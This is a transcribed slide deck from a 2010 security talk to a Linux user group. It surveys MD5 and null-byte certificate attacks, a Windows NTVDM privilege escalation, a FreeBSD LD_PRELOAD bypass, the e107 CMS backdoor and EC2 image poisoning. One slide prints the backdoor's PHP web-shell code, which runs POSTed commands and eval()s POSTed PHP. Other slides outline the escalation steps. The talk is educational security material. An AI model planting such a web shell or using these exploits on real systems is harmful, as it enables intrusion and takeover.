Attacks and Defences


Published on

Presentation by Marco Slaviero at the University of Pretoria to the Tuks Linux User Group in 2010.

The aim of this presentation is to promote information security. The presentation begins with a look at a few recent attacks. Cloud computing is briefly discussed. The presentation ends with a discussion on Amazon web services and its security.

Published in: Technology
  • Be the first to comment

No Downloads
Total views
On SlideShare
From Embeds
Number of Embeds
Embeds 0
No embeds

No notes for slide

Attacks and Defences

  1. 1. Attacks and defences Or, really cool hacks <ul><li>[email_address] </li></ul>
  2. 2. About Us <ul><li> company </li></ul><ul><li>+- 20 ppl </li></ul><ul><li>Pen-testing for a living </li></ul><ul><ul><li>VMS </li></ul></ul><ul><ul><li>training </li></ul></ul><ul><li> </li></ul><ul><li>[email_address] </li></ul>
  3. 3. Why this talk? <ul><li>Explain a little about recent attacks </li></ul><ul><li>Promote security </li></ul><ul><li>FLOSS angle? hmmm. FLOSS also insecure? </li></ul><ul><li>ZaCon (but only at the end, I promise) </li></ul>
  4. 4. x509 and MD5
  5. 7. x509 attack: MD5 <ul><li>Security of system rests in the certificate signature </li></ul><ul><li>Security of signature lies in the hashing algorithm </li></ul><ul><ul><li>(Aside: hash function == one-way function that produces fixed size output. MD5, SHA1, RIPE-MD etc) </li></ul></ul><ul><li>If two certificates hash to the same value, then their signatures will be the same </li></ul>
  6. 9. x509 attack: MD5 <ul><li>Alexander Sotirov, Marc Stevens, Jacob Appelbaum, Arjen Lenstra, David Molnar, Dag Arne Osvik, Benne de Weger </li></ul><ul><li>Figured out a way to create two colliding certificates </li></ul><ul><li>Then found CAs issuing certs with MD5, with predictable sequence numbers </li></ul>
  7. 10. x509 attack: MD5 <ul><li>Attack was: </li></ul><ul><ul><li>Predict sequence number by purchasing a cert, +1000 </li></ul></ul><ul><ul><li>Predict validity times </li></ul></ul><ul><ul><li>Create two colliding certificates, one legit and the other evil. Legit cert assumes fixed seq # and validity. </li></ul></ul><ul><ul><li>Submit CSR for legit cert </li></ul></ul><ul><ul><li>Holds thumbs on the timing/sequence number </li></ul></ul><ul><ul><li>Cut-n-paste the signature onto the evil cert </li></ul></ul>
  8. 11. x509 attack: MD5 <ul><ul><li>Collision attack perform on cluster of 200 PS3 </li></ul></ul><ul><ul><li>Could perform 3 collisions in 72 hours </li></ul></ul><ul><ul><li>Cost them $600 in purchased certs </li></ul></ul><ul><ul><li>Earned a valid CA-cert </li></ul></ul>
  9. 12. x509 and the CN
  10. 13. x509 attack: CN <ul><li>Moxie Marlinspike loves SSL </li></ul><ul><li>He looked into how certs are issued and validated </li></ul><ul><li>CSRs use ASN.1 to serialise their data </li></ul><ul><ul><li>Strings are prepended by their length </li></ul></ul><ul><li>Most libraries (by extension browsers) use C functions to validate certs </li></ul><ul><ul><li>Strings terminated by nulls </li></ul></ul>
  11. 14. x509 attack: CN <ul><ul><li>CN when evaluated in a CSR </li></ul></ul><ul><ul><li>CN as seen by a browser </li></ul></ul>
  12. 15. x509 attack: CN <ul><ul><li>CA’s verify the domain from the end </li></ul></ul><ul><ul><li>Browsers verify the domain from the front </li></ul></ul>
  13. 16. x509 attack: CN <ul><ul><li>No explicit ban on disallowed characters in the CN </li></ul></ul><ul><ul><li>How about sending a NULL byte in a CSR </li></ul></ul><ul><ul><li> </li></ul></ul><ul><ul><li>CA validates from the end, and if we’re the owner of, then we get back a cert </li></ul></ul><ul><ul><li>When victims receive the malicious cert, their libs validate from the beginning, halting at NULL </li></ul></ul>
  14. 17. Validating the cert <ul><ul><li>Checks performed by the library </li></ul></ul><ul><ul><li>Certificate is signed by trusted CA </li></ul></ul><ul><ul><li>Validity is fine </li></ul></ul><ul><ul><li>CN appears to match hostname </li></ul></ul><ul><ul><li>Great! </li></ul></ul>
  15. 18. PKI attacks: cert checking <ul><ul><li>Who was vulnerable? </li></ul></ul><ul><ul><li>All NSS-based app </li></ul></ul><ul><ul><li>Firefox </li></ul></ul><ul><ul><li>Thunderbird </li></ul></ul><ul><ul><li>... </li></ul></ul><ul><ul><li>IE </li></ul></ul><ul><ul><li>Bunch of others (Pidgin, AIM, Outlook, Evolution, VPN clients, ...) </li></ul></ul>
  16. 19. PKI attacks: cert checking <ul><ul><ul><li>More attacks including wildcard certs as well as remote buffer overflows </li></ul></ul></ul><ul><ul><ul><li> </li></ul></ul></ul>
  17. 20. Win32 ring3 -> ring0
  18. 21. Win32: privilege escalation <ul><ul><ul><li>Tavis Ormandy (Google) found a bug in how ‘iret’ was handled on NetBSD <-- he’s a UNIX guy </li></ul></ul></ul><ul><ul><ul><li>Poked around on Win32 </li></ul></ul></ul><ul><ul><ul><li>Found a related bug in the 8086 simluator on Win32 </li></ul></ul></ul><ul><ul><ul><li>Great example of long-standing bug (*) </li></ul></ul></ul><ul><ul><ul><li>Ridiculous exploit </li></ul></ul></ul><ul><ul><ul><li>Background... </li></ul></ul></ul>
  19. 22. Win32: 8086 simulator <ul><li>Win32 supports execution of real-mode code </li></ul><ul><li>Simulated environment </li></ul><ul><li>Simulated app is run by a monitor, which performs necessary sanity checks. Provides fake interrupt handlers. </li></ul><ul><li>In real-mode, apps get to change segment registers which they can’t in protected mode. </li></ul><ul><li>Monitor calls into NT kernel when needed, on behalf of the simulated app. </li></ul>
  20. 23. Win32: exploit description <ul><li>Spawn ‘cmd.exe’, grab handle </li></ul><ul><li>Spawn ‘debug.exe’, which inits the NTVDM subsystem incl monitor </li></ul><ul><li>Inject a DLL into the monitor </li></ul><ul><li>DLL creates a fake kernel stack </li></ul><ul><li>Creates a new VDM context </li></ul><ul><li>Inserts a forged trap frame on the real stack, that points to fake kernel stack </li></ul><ul><li>Executes code that gens a #GP trap handler on ‘iret’ </li></ul><ul><li>Handler aborts early, forged frame restored. Control passes to attacker supplied code. </li></ul><ul><li>Code searches for SYSTEM token and assigns it to the initial ‘cmd.exe’ </li></ul><ul><li>Code cleans up completely and returns </li></ul><ul><li>cmd.exe is now ‘SYSTEM’ </li></ul>
  21. 24. Win32 demo
  22. 25. FreeBSD rtld
  23. 26. FreeBSD: rtld <ul><li>dynamic linking </li></ul><ul><li>environment variables </li></ul><ul><ul><li>LD_PRELOAD </li></ul></ul><ul><ul><li> ./myproggie </li></ul></ul><ul><ul><ul><li>useful: substitute standard calls etc etc </li></ul></ul></ul><ul><ul><ul><li>will execute _init() from before main() </li></ul></ul></ul><ul><li>what about suid programs? </li></ul><ul><ul><li>gotta remove dangerous environmental variables like LD_PRELOAD </li></ul></ul>
  24. 27. FreeBSD: rtld code <ul><ul><li>if (suid) { </li></ul></ul><ul><ul><ul><li>... </li></ul></ul></ul><ul><ul><ul><li>unsetenv(“LD_PRELOAD”); </li></ul></ul></ul><ul><ul><ul><li>unsetenv(“LD_LIBMAP”); </li></ul></ul></ul><ul><ul><ul><li>... </li></ul></ul></ul><ul><ul><li>} </li></ul></ul><ul><li>int __merge_environ(){ </li></ul><ul><ul><li>... </li></ul></ul><ul><ul><ul><li>if (strchr(*env, ‘=’) == NULL) { </li></ul></ul></ul><ul><ul><ul><ul><li>return -1; </li></ul></ul></ul></ul><ul><ul><li>... </li></ul></ul><ul><li>int unsetenv(const char *name){ </li></ul><ul><ul><li>... </li></ul></ul><ul><ul><ul><li>if (__merge_environ() == -1) { </li></ul></ul></ul><ul><ul><ul><ul><li>return -1; </li></ul></ul></ul></ul><ul><li>... </li></ul><ul><li>//unset env variable here </li></ul>
  25. 28. FreeBSD: rtld <ul><ul><li>So, executing with a corrupted env means the unsetenv()s will be aborted early, and the linker didn’t check for this </li></ul></ul><ul><ul><li>One corrupted environment is: </li></ul></ul><ul><ul><ul><li>{ “moomoo”, “” } </li></ul></ul></ul><ul><ul><ul><li>This skips unsetting of env, but loader will still load the lib </li></ul></ul></ul><ul><ul><li>Now for the evilness... </li></ul></ul>
  26. 29. FreeBSD demo
  27. 30. e107 Backdoor
  28. 31. e107 Backdoor <ul><li>Example of a real-world attack </li></ul><ul><li>Popular Open Source CMS </li></ul><ul><li>Large community / plugins /themes / blah blah </li></ul><ul><li>A blind SQL injection vuln reported in ver 0.7.15 (Nov 3, 2009) </li></ul><ul><li>On 25 Jan 2010, a mail appeared on FD </li></ul>
  29. 32. . <ul><li>. </li></ul>
  30. 33. e107: backdoor code <ul><li>if(md5($_COOKIE['access-admin']) = &quot;cf1afec15669cb96f09befb7d70f8bcb&quot;) </li></ul><ul><li>{ </li></ul><ul><li>... </li></ul><ul><li>if(!empty($_POST['cmd'])) </li></ul><ul><li>{ </li></ul><ul><li>$out = execute($_POST['cmd']); </li></ul><ul><li>} </li></ul><ul><li>elseif(!empty($_POST['php'])){ </li></ul><ul><li>ob_start(); </li></ul><ul><li>eval($_POST['php']); </li></ul><ul><li>$out = ob_get_contents(); </li></ul><ul><li>ob_end_clean(); </li></ul><ul><li>} </li></ul><ul><li>... </li></ul><ul><li>} </li></ul>
  31. 34. e107 Backdoor <ul><li>turns out they were owned through the SQLi bug </li></ul><ul><li>attackers replaced download link with a link to the backdoored code </li></ul>
  32. 35. Let’s talk cloud computing <ul><li>(it’s hot right now, isn’t it?) </li></ul>
  33. 36. So, what exactly *is* the cloud?
  34. 39. What drives cloud adoption? <ul><li>Management by in-flight magazine </li></ul><ul><ul><li>Manager Version </li></ul></ul><ul><ul><li>Geek Version </li></ul></ul><ul><li>Poor history from IT </li></ul><ul><li>Economy is down </li></ul><ul><ul><li>Cost saving becomes more attractive </li></ul></ul><ul><ul><li>Cloud computing allows you to move from CAPEX to OPEX </li></ul></ul><ul><ul><li>(Private Clouds?) </li></ul></ul>
  35. 40. Problems with cloud testing <ul><li>Transparency </li></ul><ul><li>Privacy </li></ul><ul><li>Compliance </li></ul><ul><li>Legal </li></ul><ul><li>Vendor Lock-in </li></ul><ul><li>Availability </li></ul>
  36. 41. BlackHat talk summary <ul><li>Attacked SugarSync, SalesForce, Amazon, MobileMe </li></ul><ul><li>Not enough time!!! </li></ul><ul><li>Amazon it is then... </li></ul>
  37. 42. Yes, it’s that cool...
  38. 43. Amazon EC2 <ul><li>Elastic Compute Cloud </li></ul><ul><li>Provides Xen platform for running virtual machines </li></ul><ul><li>Easy (Web interface) </li></ul><ul><li>Auto-scales </li></ul><ul><li>Cheap </li></ul><ul><li>Login, pick VM, boot, go! </li></ul>
  39. 44. Danger <ul><li>Out of 2700 images, 47 are provided by Amazon </li></ul><ul><li>Are all secured equally? </li></ul><ul><li>Tested by scanning each VM with Nessus </li></ul><ul><ul><li>1293 Highs </li></ul></ul><ul><ul><li>646 Criticals </li></ul></ul><ul><li>Not good </li></ul><ul><li>Incompetence aside, what can we ascribe to malice? </li></ul>
  40. 45. Can we get someone to run our machine? <ul><li>Bundle an image </li></ul><ul><li>Register the image (Amazon assigns it an AMI-ID) </li></ul><ul><li>Wait for someone to run it </li></ul><ul><li>Profit! </li></ul><ul><li>Alas... our AMI-ID is too low! </li></ul><ul><li>Solution: </li></ul><ul><ul><li>do { /*register stuff */ } while (ami-id > threshold) </li></ul></ul>
  41. 46. But there’s more <ul><li>Our race promoted our strangely named image (qscan) </li></ul><ul><li>Let’s make it sexier </li></ul><ul><ul><li>fedora - taken </li></ul></ul><ul><ul><li>fedora_core - taken </li></ul></ul><ul><ul><li>redhat - taken </li></ul></ul><ul><ul><li>fedora_core_11 - not taken! </li></ul></ul>
  42. 49. What other cloud hacks? <ul><li>SugarSync password reset </li></ul><ul><li>ClickJacking against SalesForce </li></ul><ul><li>Porting Nikto into SalesForce </li></ul><ul><li>License stealing from Amazon </li></ul><ul><li>Image stealing from Amazon users </li></ul><ul><li>Found bugs in MobileMe </li></ul><ul><li>In a position to read Steve Wozniak’s mail :) </li></ul><ul><li> </li></ul>
  43. 50. Linux bugs (it’s TLUG)
  44. 51. Linux <ul><li>all kernels bugs are DoS </li></ul><ul><li>not really. </li></ul><ul><li>Tavis (remember him?) and Julien Tinnes found an exploitable bug in sendpage(), June 2009 </li></ul><ul><li>>2.4.4 and all 2.6 kernels </li></ul><ul><li>existed since 2001 </li></ul>
  45. 52. Linux demo
  46. 53. Questions? [email_address] <ul><li>As promised: </li></ul><ul><li>ZaCon -> community </li></ul><ul><li>sec conference </li></ul><ul><li>First edition in Nov ’09 </li></ul><ul><li>Papers / vids / list </li></ul><ul><li>details on the site </li></ul><ul><li> </li></ul>Attendees / speakers welcome Great venue for 1st-time speakers Look out for announcements.